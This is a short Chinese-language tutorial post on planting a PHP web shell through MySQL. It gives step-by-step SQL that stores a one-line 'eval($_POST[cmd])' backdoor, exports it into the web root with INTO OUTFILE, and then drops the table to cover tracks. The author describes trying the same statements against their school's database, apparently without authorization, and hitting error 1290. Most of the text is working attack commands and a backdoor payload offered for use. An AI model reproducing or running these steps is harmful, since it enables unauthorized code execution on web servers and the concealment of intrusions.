利用MySQL拿webshell
前提:在知道数据库地址、数据库用户名、密码的情况下(先在本地的数据库验证一下想法的可行性)
1.打开任意数据库并创建一个表
create TABLE a (cmd text NOT NULL);
2.插入一句话木马
insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
3.导出一句话木马 (通过phpinfo发现绝对路径)
select cmd from a into outfile '/mnt/sdcard/www/ma.php';
4.执行成功后打开绝对路径查看是否创建了ma.php并查看内容是否为一句话木马
成功插入
5.删除刚刚创建的表(擦屁股走人)
Drop TABLE IF EXISTS a;
但测试很美好实战问题就一大堆了
将刚刚在本地测试的语句中运用到学校数据库,报了1290错误。。。